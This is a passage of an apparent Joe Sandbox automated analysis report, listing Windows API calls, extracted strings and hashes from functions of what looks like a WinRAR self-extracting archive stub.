                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prologItemTextWindow
                                                                                              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 810644672-8108337

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 001000E4
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001000F6
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00100127
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001003D4
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001003F0
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00100402
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00123BA4,00000000), ref: 00100421
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00100479
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0010048F
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001004E7
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00100510
                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0010054A
                                                                                                • Part of subcall function 00100085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                                • Part of subcall function 00100085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              • _swprintf.LIBCMT ref: 001005BE
                                                                                              • _swprintf.LIBCMT ref: 0010060A
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • AllocConsole.KERNEL32 ref: 00100612
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0010061C
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00100623
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00100649
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00100650
                                                                                              • Sleep.KERNEL32(00002710), ref: 0010065B
                                                                                              • FreeConsole.KERNEL32 ref: 00100661
                                                                                              • ExitProcess.KERNEL32 ref: 00100669
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1201351596-3298887752
                                                                                              • Opcode ID: d54a727b9d6e3f8b75a3939c7e80c8e7e6ab6b7d208afe494e6a3133c267b69e
                                                                                              • Instruction ID: cfb90e964fbccdae76fad07b297d0cdfd960a047ebb91f82509f9d3b76b7a9f3
                                                                                              • Opcode Fuzzy Hash: d54a727b9d6e3f8b75a3939c7e80c8e7e6ab6b7d208afe494e6a3133c267b69e
                                                                                              • Instruction Fuzzy Hash: 34D186B1108394ABD331DF50ED49BDFBAE8FB84704F40091DF6E8A6180D7B886598F66

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0010BDFA
                                                                                                • Part of subcall function 0010AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0010AAFE
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0010C127
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 0010C2B1
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0010C2EC
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0010C2FC
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,0013A472), ref: 0010C30A
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0010C335
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 3564274579-312220925
                                                                                              • Opcode ID: 7b594a6eaa435347ac556e9a45365b4ea697b9e0f171c93bbe3355d49552a709
                                                                                              • Instruction ID: 658a7844bf3a0e60c90cca971048968032de956b5de39cb360e3865deb5fa548
                                                                                              • Opcode Fuzzy Hash: 7b594a6eaa435347ac556e9a45365b4ea697b9e0f171c93bbe3355d49552a709
                                                                                              • Instruction Fuzzy Hash: B6E17076D04219EADB25DBA0DC85DEF737CAF19711F0041A6F649E3091EBB49AC48FA0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000FD346
                                                                                              • _wcschr.LIBVCRUNTIME ref: 000FD367
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,000FD328,?), ref: 000FD382
                                                                                              • __fprintf_l.LIBCMT ref: 000FD873
                                                                                                • Part of subcall function 0010137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000FB652,00000000,?,?,?,00010412), ref: 00101396
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 4184910265-980926923
                                                                                              • Opcode ID: 2f5346e9c13d5bbc395e72b1e3a5607dc1f341fd2b5e9d9bab0836658b2b2f85
                                                                                              • Instruction ID: 971d205afcc0a56e5518ea42a95137fab287604e2d90213810e52420fddd0670
                                                                                              • Opcode Fuzzy Hash: 2f5346e9c13d5bbc395e72b1e3a5607dc1f341fd2b5e9d9bab0836658b2b2f85
                                                                                              • Instruction Fuzzy Hash: E812C27190021D9ADF24EFA4DC85BFEB7B6FF14704F10416AE715A7592EB709A80EB20

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0010AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010AC85
                                                                                                • Part of subcall function 0010AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010AC96
                                                                                                • Part of subcall function 0010AC74: IsDialogMessageW.USER32(00010412,?), ref: 0010ACAA
                                                                                                • Part of subcall function 0010AC74: TranslateMessage.USER32(?), ref: 0010ACB8
                                                                                                • Part of subcall function 0010AC74: DispatchMessageW.USER32(?), ref: 0010ACC2
                                                                                              • GetDlgItem.USER32(00000068,0014ECB0), ref: 0010CB6E
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0010A632,00000001,?,?,0010AECB,00124F88,0014ECB0), ref: 0010CB96
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0010CBA1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,001235B4), ref: 0010CBAF
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0010CBC5
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0010CBDF
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0010CC23
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0010CC31
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0010CC40
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0010CC67
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,0012431C), ref: 0010CC76
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: acd27e42a7c46b1e9be118aada48cea8ae90b7f64d0c1735f26cbca0ab45f3ba
                                                                                              • Instruction ID: 59aa9390497c566fbc8397a2babe12774b58cb86d704337b063cb9922c11ad66
                                                                                              • Opcode Fuzzy Hash: acd27e42a7c46b1e9be118aada48cea8ae90b7f64d0c1735f26cbca0ab45f3ba
                                                                                              • Instruction Fuzzy Hash: 2731C172145741EBE311DF20DC4AFAB7FACEB82715F000508F6A19A5D1DB745944CBB6

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 0010CF54
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0010CF93
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0010CFCF
                                                                                              • CloseHandle.KERNEL32(?), ref: 0010CFF5
                                                                                              • ShowWindow.USER32(?,00000001), ref: 0010D084
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                              • String ID: $.exe$.inf

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00114E35,00114E35,?,?,?,0011A2A9,00000001,00000001,3FE85006), ref: 0011A0B2
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0011A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0011A138
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0011A232
                                                                                              • __freea.LIBCMT ref: 0011A23F
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              • __freea.LIBCMT ref: 0011A248
                                                                                              • __freea.LIBCMT ref: 0011A26D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap

                                                                                              APIs
                                                                                                • Part of subcall function 00100085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                                • Part of subcall function 00100085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              • OleInitialize.OLE32(00000000), ref: 0010A34E
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0010A385
                                                                                              • SHGetMalloc.SHELL32(00138430), ref: 0010A38F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll$3Ro

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,000F78AD,?,00000005,?,00000011), ref: 000F9A4C
                                                                                              • GetLastError.KERNEL32(?,?,000F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F9A59
                                                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,000F78AD,?,00000005,?), ref: 000F9A8E
                                                                                              • GetLastError.KERNEL32(?,?,000F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F9A96
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F9ADB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time

                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010AC85
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010AC96
                                                                                              • IsDialogMessageW.USER32(00010412,?), ref: 0010ACAA
                                                                                              • TranslateMessage.USER32(?), ref: 0010ACB8
                                                                                              • DispatchMessageW.USER32(?), ref: 0010ACC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate

                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0010A2DE
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0010A315
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0010A305
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT

                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0010D29D
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0010D2D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 000F985E
                                                                                              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 000F9876
                                                                                              • GetLastError.KERNEL32 ref: 000F98A8
                                                                                              • GetLastError.KERNEL32 ref: 000F98C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: c404021de34063fe2cf9a8c56e1fc29e182062da68399d89584acd93aa4ec52b
                                                                                              • Instruction ID: bb994b7bed3dedc8d60518261641db2da2b006e3b90dd763208ae8cea4bf80f5
                                                                                              • Opcode Fuzzy Hash: c404021de34063fe2cf9a8c56e1fc29e182062da68399d89584acd93aa4ec52b
                                                                                              • Instruction Fuzzy Hash: 62119E3090020CFBDB705A51C804BB977E8EB427B1F10812AFA2A85D90DF399E42BB51
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00113713,00000000,00000000,?,0011A49B,00113713,00000000,00000000,00000000,?,0011A698,00000006,FlsSetValue), ref: 0011A526
                                                                                              • GetLastError.KERNEL32(?,0011A49B,00113713,00000000,00000000,00000000,?,0011A698,00000006,FlsSetValue,00127348,00127350,00000000,00000364,?,00119077), ref: 0011A532
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0011A49B,00113713,00000000,00000000,00000000,?,0011A698,00000006,FlsSetValue,00127348,00127350,00000000), ref: 0011A540
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 71529825f3fb85da9e77ebcf2100213239ebd8c942b7b7f8225803f3f3e3e19a
                                                                                              • Instruction ID: e86b9fe477b0950466af1ccc1f5581fb1ca993bbd77af26398d410d1124f8cd6
                                                                                              • Opcode Fuzzy Hash: 71529825f3fb85da9e77ebcf2100213239ebd8c942b7b7f8225803f3f3e3e19a
                                                                                              • Instruction Fuzzy Hash: D1017B3271B222BBC7758B78AC44AA67F99AF01BA1B510230F90AD3140D734D991C6E1
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,000FCC94,00000001,?,?,?,00000000,00104ECD,?,?,?), ref: 000F9F4C
                                                                                              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00104ECD,?,?,?,?,?,00104972,?), ref: 000F9F8E
                                                                                              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,000FCC94,00000001,?,?), ref: 000F9FB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: de4c41656eafd5212041d5e4c54340adbd7e19d88ffbda9f861e17559ed49677
                                                                                              • Instruction ID: ef47435ba766fd6dca228e25e42664ce19358155504f3ccec79c5819e501a8b6
                                                                                              • Opcode Fuzzy Hash: de4c41656eafd5212041d5e4c54340adbd7e19d88ffbda9f861e17559ed49677
                                                                                              • Instruction Fuzzy Hash: F33104712083099BDF208F14D948B7ABBE8EB41710F044528FA49DA981CB75D94DEBB2
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA22E
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA261
                                                                                              • GetLastError.KERNEL32(?,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA27E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 2485089472-0
                                                                                              • Opcode ID: 77171616e0f45a208430e748db7d078f59e1eea3a1cd3ff48dd5caf552bbe042
                                                                                              • Instruction ID: 1a2b3d4fa393bbe0fa8be905f9ff029bd19dba464b8434cf602e56c95a429ca4
                                                                                              • Opcode Fuzzy Hash: 77171616e0f45a208430e748db7d078f59e1eea3a1cd3ff48dd5caf552bbe042
                                                                                              • Instruction Fuzzy Hash: 3C0192B134021C66DFB29B688C45BFE3388AF0B741F044451FB49D5891D76ADA81B6B7
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0011B019
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 0e01c3a3b449348170f2dc0b86a648452b753b49bccb886e6e3497680546066a
                                                                                              • Instruction ID: 6ef97df3789f16111f98db12c733673a34cb3af10c81b152ee387f2dcd963d2f
